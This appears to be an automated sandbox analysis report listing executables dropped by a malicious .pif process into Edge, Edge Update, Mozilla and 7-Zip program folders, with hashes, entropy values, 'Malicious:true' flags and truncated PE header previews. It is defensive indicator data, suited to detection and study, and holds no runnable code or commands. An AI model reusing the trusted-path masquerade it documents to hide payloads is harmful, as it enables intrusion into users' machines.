                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......*...r......P..........@.....................................J.... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(.......*.................. ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1847808
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.145479687611655
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:jiD2VmA1YXwHwlklb8boUuWPg2gvsqjnhMgeiCl7G0nehbGZpbD:eD2VmAyiwIb8boQ8Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:271F0F10E5A9428988106D16D267E2E7
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:50115D29D0DC8ADD1B7D54BBCE59B269C800E351
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:4A44D6AC356F3237F6BA92B68AB59593BF676E6598B5A0BD3CA4C5637627E57C
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:C20BEA932CB3D1B4895B0BBDFEA70A2549FA7FF54DF948782F2FD8D2BF9DA1566CE1D99CA96CC8B12A9ACA07816C2FE7EBD3A485575451BCF34CB3D4C2EBF7E9
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p......c..... .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1801216
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.166362557673328
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:WwNHwoYhua6MtjRO4qbBJTY6mY1uIgWsqjnhMgeiCl7G0nehbGZpbD:WwNPdQO7BJTfmEtDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:9AB293BACED92E3A8B5B0E18D878ABB4
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:2AB46E93DBA378B24344640C38FCE4F8F3ACC5DD
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:E46D2884101429DA711818B3A0845173669BAE5B42CF2B03CA9B0C5B0C1EB692
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:7BEC53B6A7F0DF58F42831CA13C5F8312B303BE556518A395FB212C2FA1246EF1A58BDFF30389C7F91C04736E1476765C67233022853A5CBE63A14E10A6777DA
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......*...r......P..........@.......................................... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(.......*.................. ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1325568
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.141864410384537
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:24lbht6BHtsqjnhMgeiCl7G0nehbGZpbD:XlNtqHRDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:9D545DD231E68C6C1D32997C151A607E
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:088AC26B58CA9A8A52DCC273113A5D23A1590799
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:EEA6AC561C73FD871E2A8CC9200E3873E3D14AB04F7AC55E2FDC32142F688E71
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:EAE411F08AD6A8DCBAEA256A93850A2A0EF38697429AC2EB479733E962B2E24921E4650D384EEED2A7CEFBB5A5CC51025BE80F40B872F383C775519CE16EDC5B
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o.y.+c..+c..+c..?...!c..?....c..?...9c..I...:c..I...8c..I....c..?...*c..?....c..+c..Xc......)c.....*c..+c..|c......*c..Rich+c..........................PE..L...B(.d.................^..........@........p....@.................................6^......................................H...<........q..........................pu..p...........................X...@...............@....k..`....................text...`\.......^.................. ..`.data........p.......b..............@....idata...............l..............@..@.didat...............v..............@....rsrc....q.......r...x..............@..@.reloc...`...0...P..................@...........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1221120
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.138863266345249
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:3IkOkTB+wpXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:3IxkTBVpsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:76B3228EC4BC4786C393661DD270E705
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:DA13244C78BBE4E1BD7ABBBDC8EF6DD210CBCC2F
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:392599223A6C7CA5608CFCB6E8E2FE57ECC0AD1089E55FAC89FFFF864C10A1CF
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:2999E4F719828987AF977A52A4FFF421565C640DF0CE6639059D152F662AAB7A3427EDAD413220E86A530E2F2A141402C98B4BE0706AF8FDBC143F111341CAA1
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...8(.d..........................................@.................................Q.......................................x...(....`..X3..............................p...............................@.......................@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...`.......P...R..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1339392
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.2241571316891475
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:C4lssmroCuXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3k6:Ccssmr0sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:6D80904C7F3D954B20C7E21997EDC2D1
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:0112DA8B638F1D7566A714BEE8F24956B1F2A5A7
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:50478DC0CF29D2B6727B673EDFBE49B6A21F396924D86D19263B524E6D4F6A85
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:8D93CDDCB9059974BC7E7F7D99893D6A25E1B8E17BE2E9020F625AEB15FE7F12A9C0284B62291056E7DB2AD3EAEAAF93515866D51F95BE486F3363EDC1F40357
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............O.@.O.@.O.@.$.A.O.@.$.A|O.@.7.A.O.@.7.A.O.@.7.A.O.@W6.A.O.@.$.A.O.@.$.A.O.@.$.A.O.@.O.@IN.@W6.A.O.@W6.@.O.@W6.A.O.@Rich.O.@........PE..d...@(.d.........."......n...........].........@.......................................... .....................................................(............@..........................p.......................(...p,..@...............0............................text....l.......n.................. ..`.rdata..8z.......|...r..............@..@.data...P3..........................@....pdata.......@......................@..@.didat.......`......................@..._RDATA.......p......................@..@.rsrc...............................@..@.reloc...`.......P... ..............@...........................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1383936
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.338535681482686
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:Q03cT++foSBWU2YxhkgTsqjnhMgeiCl7G0nehbGZpbD:H3cK+foQWU2YnPXDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:08E86D654DD55B83BA77A81FA6ADAB76
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:4CD59AC6963E3B9C07E28BC7C5A982DD471069F5
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:5FECE99390BFAAB68E866AB90123B84BC92B2C474C0E000EDD2E970B181BD4C0
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:217DEFE5A3A78428C170C9E62A382F2FD77A9F41D30D1D4FFB7A43BB4C00B23C2C21DF37CDDD5E75316295FD487A6AF06D6F1EC008B4F37B51423C752D811F1E
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............wU..wU..wU.tT..wU.rTg.wU..sT..wU..tT..wU..rT..wU.sT..wU.qT..wU.vT..wU..vUQ.wUK.~T..wUK..U..wUK.uT..wURich..wU........PE..L...B(.d............................p.............@..........................................................................y..........H3...........................g..p....................g..........@....................x.......................text............................... ..`.rdata...z.......|..................@..@.data....'...........z..............@....didat..$...........................@....rsrc...H3.......4..................@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1221120
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.138907032912284
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:ubrNRzB+NzXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:ubBRzBgzsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:EA9600AF924B5EE0ABF7B50FBDDD9D33
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:AAC4C849D5432F100CD58240E0C5469049650D77
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:7C98D6303C32BA06879D1EA3D494F7986F0FB2DA757F960666E891F2AE41F529
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:C0310DCFFCD147F33FD0C7AAAC6EBB959C1254A4265AFBEDC2A70A23336D590D216FFF1E45A4C66360AD41D858631A3367CC079F91B88F0C035E3D3D47F6F9A3
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...7(.d..........................................@.............................................................................(....`..X3..............................p...............................@...................<...@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...`.......P...R..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2168832
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.940559913957733
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:Ty53w24gQu3TPZ2psFkiSqwoz1Dmg27RnWGj:TyFQgZqsFki+oz1D527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:E89ADFDAAFD9DEF9D3DF5727F9941FE0
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:AF2465D05064016B7D1E74DEAB820BCA75C7A807
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:572B79A6DD0FD4DCA960E1A2B7AAD14E574636A08F0306198AF0B0EAACF47508
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:A581692032CED19E8FA4F332FE57DB87A828B4D4F9C9DB26E14166684912B6B1558513CE89CFDDF699D1DF6F9FE2534E62590C0029F7BAB9B326CE2B125291D8
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d..[ e.. e.. e..4...+e..4....e..B...1e..B...4e......-e..B....e..4...3e..4...!e..4...-e.. e...e....@.!e.. e(.ve......!e..Rich e..................PE..L....(.d............................ }............@..........................p!......k!......................................?..x....................................1..p....................1..........@...............H...T>..`....................text...*........................... ..`.rdata..............................@..@.data...,....P.......8..............@....didat..,....p.......B..............@....rsrc................D..............@..@.reloc.......p.......(..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):3141
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.799246934186013
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:96:WUt0DnNaz25dB+G9wl4qstolAmo43Y6CN2Ngz3TaI:WUt0DNaK5dBn9wl4qstolAmo43Y6u2Nu
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:0CD801E9F08B5692CA0A8384199FAE2D
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:38ABD639FF09279D5A82D0323280560E7B70C857
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:C34598E36D9FAADABA2553E2FCED51DF3AD5B40DA1FD9E1CCE496F377A0CA8D3
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:F73159A2A042E8D1724FED821AFBB48498605C68EA201B100E2C21817AB4405AE05B789D907558F2E786A0A9805A58265786F51C88765344886502EE7DDF4404
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:2024-11-01 03:23:30-0400: Disabled unneeded token privilege: SeAssignPrimaryTokenPrivilege...2024-11-01 03:23:30-0400: Disabled unneeded token privilege: SeAuditPrivilege...2024-11-01 03:23:30-0400: Disabled unneeded token privilege: SeBackupPrivilege...2024-11-01 03:23:30-0400: Disabled unneeded token privilege: SeCreateGlobalPrivilege...2024-11-01 03:23:30-0400: Disabled unneeded token privilege: SeCreatePagefilePrivilege...2024-11-01 03:23:30-0400: Disabled unneeded token privilege: SeCreatePermanentPrivilege...2024-11-01 03:23:30-0400: Disabled unneeded token privilege: SeCreateSymbolicLinkPrivilege...2024-11-01 03:23:30-0400: Could not disable token privilege value: SeCreateTokenPrivilege. (1300)..2024-11-01 03:23:30-0400: Disabled unneeded token privilege: SeDebugPrivilege...2024-11-01 03:23:30-0400: Could not disable token privilege value: SeEnableDelegationPrivilege. (1300)..2024-11-01 03:23:30-0400: Disabled unneeded token privilege: SeImpersonatePrivilege...2024-11-01 03:23:3

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1356800
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.347867247269867
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:/QVTZu0JasqjnhMgeiCl7G0nehbGZpbD:IVTZuDDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:6E2F1562B4D5A495EA5EE8392DBBC2E3
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:D3D4630483BD9107BEC7B7C6EA95C2BBF32B93AF
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:37E1E3D64106BF053071AD93FEFED3A865AC6A23890C3ADA386DEB970D62C9D7
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:1C37585F8A0A10A8F115F464D3499BA15B90F20CABD1A20120B2560D4510F6FA31F47B819CCEBBA61214213ADA456EE7513C174CFFFC3B8828837B87DB004AD9
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................P......%..... .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...P.......@...t..............@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\7-Zip\7z.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1683968
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.623164862480578
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:t+gkESfh4CohsqjnhMgeiCl7G0nehbGZpbD:UgkE+SXDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:C1AA24077FC3505FEFAA7481B77BA452
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:36AB6A84ED283AF817578AC45C9D66F4CCAECC94
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:4377C700F1A8B2DC8125C3CA850680865C928313759C8B653F9E429CCA1CAA89
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:9CEE5C642EA2A7CF42B34E5DF2737F284FA8D4C694FBBD1873EB220DB62307CF6C8DDA9D4DB5EF4AAAC8F0A76430F3B7DDC19721D3E42C3C772E84CCF3AF0514
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............xaX.xaX.xaX...X.xaX...X.xaX.x`XlxaX...X.xaX..eY.xaX...X.xaX`.bY.xaX...X.xaX...X.xaXRich.xaX........................PE..d....\.d.........."...........................@.............................. .......U.... .....................................................x............@...q......................................................................0............................text...v........................... ..`.rdata..T...........................@..@.data....-..........................@....pdata...q...@...r..................@..@.rsrc................j..............@..@.reloc...P.......@...r..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\7-Zip\7zFM.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1532416
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.096696245713916
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:UBpDRmi78gkPXlyo0GtjrisqjnhMgeiCl7G0nehbGZpbD:wNRmi78gkPX4o0GtjSDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:EBB327AEDA78374F965CD6C8CAD40AA1
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:0A310C46547EC171625815BB40CB825A8200C036
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:4444A0D7C7826DE3BDCC552BC56A46AD69C378BCF486A8AE598E2246699B3F24
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:02C97460CA51E693F296311B6CC71DBF67FB543DF1F681E333267CD935CBB04B4BB08FAF9863BD0672E3235085B58B031F4404ECFED950B54818573E6DB63E22
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\..2..2..2.0.\..2..I..2..3..2..O..2..\.D.2...6..2.._..2..N..2..J..2.Rich.2.........................PE..d....\.d.........."......b...8......Pi........@......................................I.... .................................................P................... .......................................................................(.......@....................text....a.......b.................. ..`.rdata...i.......j...f..............@..@.data...............................@....pdata.. ...........................@..@.rsrc...............................@..@.reloc...............r..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\7-Zip\7zG.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1282048
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.229101649956576
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:lLOS2oTPIXVhsqjnhMgeiCl7G0nehbGZpbD:P/TKDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:1034B0FD43953EC495D96EE211AB53DC
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:8CF2561E74900F79EA9FCA109E1E18B421DD4947
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:343B547D2F9DA9FB434E91253DB7472A0D622780023566118657BF102B43E793
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:705275990467EE13A9EF1E801998565716559991646F5636439B8CA84961F2B959BCEA19033BB877C04C097511849DFA8640B5505BDDAA4A02CA7DA03BC547AE
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;.VS.y8..y8..y8...C.jy8..y9..y8...E.}y8...V..y8.i.<.~y8...U.ky8...;.~y8...D.~y8...@.~y8.Rich.y8.........PE..d....\.d.........."......&..........."........@......................................m.... ..............................................................d...........................................................................@...............................text...4$.......&.................. ..`.rdata..Ts...@...t...*..............@..@.data...83..........................@....pdata..............................@..@.rsrc....d.......f...:..............@..@.reloc..............................@...........................................................................................................................................................................................................................................................................

